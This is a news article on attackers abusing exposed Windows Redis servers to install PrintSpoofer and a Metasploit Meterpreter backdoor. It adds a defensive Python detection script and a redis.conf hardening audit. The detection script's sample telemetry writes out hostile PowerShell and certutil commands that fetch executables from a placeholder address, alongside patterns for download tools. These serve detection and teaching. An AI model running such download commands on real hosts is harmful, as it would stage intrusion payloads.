
Redis servers exploited to install Metasploit Meterpreter backdoor


Threat actors are installing the Metasploit Meterpreter backdoor on Windows devices by abusing exposed instances of Redis (Remote Dictionary Server), an open-source in-memory data store.

Redis is used worldwide for purposes including session management, message brokering and queuing. Because it is so widely deployed, and often reachable from the internet, it is also a recurring target for threat actors.

Threat actors have previously used weaknesses in Redis deployments, above all instances exposed without any authentication, to install malware families including Kinsing, P2PInfect, Skidmap, Migo and HeadCrab. These families pose a serious risk to organisations that rely on Redis for critical operations.

In the campaign now under analysis, researchers found that Windows systems running Redis 3.x were being targeted. After gaining access, the attacker used PrintSpoofer, an open-source privilege escalation tool that abuses the SeImpersonatePrivilege typically held by Windows service accounts to obtain SYSTEM-level access; it does not depend on a missing patch, only on the compromised process holding that privilege.

With PrintSpoofer in place, the attacker escalated to full control of the host, clearing the way for the later stages of the attack.

Log showing threat actor installing PrintSpoofer.

One notable detail is that PowerShell’s Invoke-WebRequest cmdlet was used to download PrintSpoofer and place it inside the Redis installation directory. This choice of location, combined with the modification of certain strings within the PrintSpoofer binary, points to an effort to evade signature-based detection and make the intrusion harder to spot.

The researchers also noted a shift in tradecraft compared with earlier attacks on Redis servers. Previously, the attackers relied on PowerShell to download their payloads; in this campaign, the next stage was fetched with certutil, a signed Windows utility that is commonly abused as a downloader. Defenders therefore cannot assume that monitoring PowerShell alone will catch these downloads.

Log showing the installation of Metasploit Stager.

Once PrintSpoofer had given the attacker elevated privileges, the threat actor deployed a Metasploit stager. A stager is a small first-stage payload that connects back to the attacker’s Metasploit handler and retrieves the much larger Meterpreter payload, typically straight into memory. Meterpreter is a full-featured backdoor that grants the attacker complete control over the compromised system: it can access sensitive data, execute arbitrary commands and establish persistence within the network.
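To show how the download chain described above would surface in endpoint telemetry, here is an added detection example; it is not code from ASEC or from this article. It runs over a handful of constructed process-creation events in the shape of Sysmon Event ID 1 fields (parent image, image, command line). The host paths, the 203.0.113.10 address and the file names are placeholders rather than indicators from the report, and the assumption that the Windows Redis port is installed under a directory named Redis is the author’s, not the page’s.

```python
"""Hunt for the PowerShell / certutil download chain in process-creation telemetry.

Added example, not ASEC's or the article's code.  The events at the bottom are
constructed in the shape of Sysmon Event ID 1 (or Security 4688) records.
"""
import re
from dataclasses import dataclass
from typing import List, Tuple


@dataclass
class ProcEvent:
    """Minimal process-creation record."""
    parent_image: str
    image: str
    command_line: str


# A Redis process has no legitimate reason to spawn a shell or a downloader.
REDIS_PARENTS = {"redis-server.exe", "redis-cli.exe"}
LOLBINS = {"cmd.exe", "powershell.exe", "pwsh.exe", "certutil.exe"}

# Download primitives seen in the chain: Invoke-WebRequest (plus the aliases and
# .NET methods PowerShell offers for the same job) and certutil's -urlcache trick.
PS_DOWNLOAD = re.compile(
    r"invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b|downloadfile|downloadstring|start-bitstransfer",
    re.IGNORECASE,
)
CERTUTIL_DOWNLOAD = re.compile(r"-urlcache\b", re.IGNORECASE)

# Assumption: the Windows Redis port lives under a directory called "Redis".
# Adjust to the install root used in your environment.
REDIS_DIR = re.compile(r"[\\/]redis[\\/]", re.IGNORECASE)


def _base(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(ev: ProcEvent) -> List[str]:
    """Return zero or more finding tags for one event, in a fixed order."""
    parent, child, cmd = _base(ev.parent_image), _base(ev.image), ev.command_line
    tags: List[str] = []
    if child in {"powershell.exe", "pwsh.exe"} and PS_DOWNLOAD.search(cmd):
        tags.append("powershell_download")
    if child == "certutil.exe" and CERTUTIL_DOWNLOAD.search(cmd):
        tags.append("certutil_download")
    if parent in REDIS_PARENTS and child in LOLBINS:
        tags.append("redis_spawned_lolbin")
    # A download landing in the Redis install directory mirrors the reported tradecraft.
    if tags and REDIS_DIR.search(cmd):
        tags.append("dropped_in_redis_dir")
    return tags


def hunt(events: List[ProcEvent]) -> List[Tuple[int, List[str]]]:
    """Return (index, tags) for every event that produced at least one finding."""
    out: List[Tuple[int, List[str]]] = []
    for i, ev in enumerate(events):
        tags = classify(ev)
        if tags:
            out.append((i, tags))
    return out


# Constructed sample telemetry (placeholder paths, address and file names).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = [
    ProcEvent(r"C:\Program Files\Redis\redis-server.exe", r"C:\Windows\System32\cmd.exe",
              "cmd.exe /c whoami"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", PS,
              r"powershell -c \"Invoke-WebRequest http://203.0.113.10/ps.exe -OutFile 'C:\Program Files\Redis\ps.exe'\""),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\certutil.exe",
              r"certutil -urlcache -f http://203.0.113.10/stager.exe C:\Program Files\Redis\st.exe"),
    ProcEvent(r"C:\Windows\explorer.exe", PS, "powershell -c Get-Service"),          # benign
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\certutil.exe",
              r"certutil -hashfile C:\tools\x.exe SHA256"),                          # benign
]

if __name__ == "__main__":
    for idx, tags in hunt(EVENTS):
        print(idx, EVENTS[idx].command_line[:60], tags)
```

The rule set is deliberately narrow: each tag on its own is a weak signal (administrators do run Invoke-WebRequest), but a Redis process spawning a shell, or a download that lands in the Redis directory, is worth an alert on any host that should only be serving cache traffic.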

The implications are far-reaching. Organisations running Redis servers, especially instances reachable from the internet without adequate controls, are at heightened risk of similar attacks. The researchers emphasised promptly patching Redis, securing it (not least by keeping it off the internet), enforcing strong authentication and running endpoint protection software to mitigate these threats effectively.
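As an added example of the hardening advice above (not code from ASEC or this article), the following Python audits a redis.conf for the settings that leave an instance open to this kind of attack, and shows a weak configuration beside a hardened one. Both configurations are constructed; the directives are standard Redis ones that exist in the 3.x line the attacked hosts were running, and the list of commands to disable is the author’s choice, not a recommendation taken from the report.

```python
"""Audit a redis.conf for the exposure the article warns about.

Added example, not from ASEC or the article.  WEAK_CONF and HARDENED_CONF are
constructed for illustration.
"""
from typing import Dict, List, Set, Tuple

# Constructed: a typical "just make it work" configuration.
WEAK_CONF = """
port 6379
bind 0.0.0.0
protected-mode no
# requirepass foobared
"""

# Constructed: the same instance, hardened.
HARDENED_CONF = """
port 6379
bind 127.0.0.1
protected-mode yes
requirepass 6d2f0a1e5c3b4a9f8e7d6c5b4a3f2e1d0c9b8a7f6e5d4c3b2a1f0e9d8c7b6a5f
rename-command CONFIG ""
rename-command DEBUG ""
rename-command SLAVEOF ""
rename-command FLUSHALL ""
"""

WILDCARD_BINDS = {"0.0.0.0", "*", "::", "::*"}
# Commands that hand an unauthenticated client a file-write, replication or
# data-destruction primitive (author's selection; all exist in Redis 3.x).
DANGEROUS = ("CONFIG", "DEBUG", "SLAVEOF", "FLUSHALL")


def parse_conf(text: str) -> Tuple[Dict[str, List[str]], Set[str]]:
    """Return {directive: args} and the set of renamed commands.

    Later lines override earlier ones for single-valued directives, mirroring
    Redis's in-order parsing; rename-command lines accumulate.
    """
    conf: Dict[str, List[str]] = {}
    renamed: Set[str] = set()
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        key = parts[0].lower()
        if key == "rename-command" and len(parts) >= 2:
            renamed.add(parts[1].upper())
        else:
            conf[key] = [p.strip('"') for p in parts[1:]]
    return conf, renamed


def audit(text: str) -> List[str]:
    """Return human-readable findings; an empty list means nothing flagged."""
    conf, renamed = parse_conf(text)
    findings: List[str] = []

    binds = conf.get("bind", [])            # no bind line: Redis listens everywhere
    if not binds or WILDCARD_BINDS & set(binds):
        findings.append("bind: reachable on every interface")

    if conf.get("protected-mode", ["yes"])[0].lower() != "yes":
        findings.append("protected-mode: disabled")

    pw = conf.get("requirepass", [""])
    if not pw or not pw[0]:
        findings.append("requirepass: no authentication")
    elif len(pw[0]) < 32:
        findings.append("requirepass: password too short to resist online guessing")

    for cmd in DANGEROUS:
        if cmd not in renamed:
            findings.append(f"rename-command: {cmd} still exposed")
    return findings


if __name__ == "__main__":
    for name, text in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit(text) or "OK")
```

Note that protected-mode only refuses remote clients when no password and no explicit bind are set, so it is a safety net rather than a substitute for the other three controls; and a long requirepass matters because Redis answers AUTH fast enough for brute force to be practical against short secrets.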

In March 2023, a bug in the open-source redis-py client library used by ChatGPT exposed some users’ personal and payment information to other users.


Kumar Hemant


Deputy Editor at Candid.Technology. Hemant writes at the intersection of tech and culture and has a keen interest in science, social issues and international relations.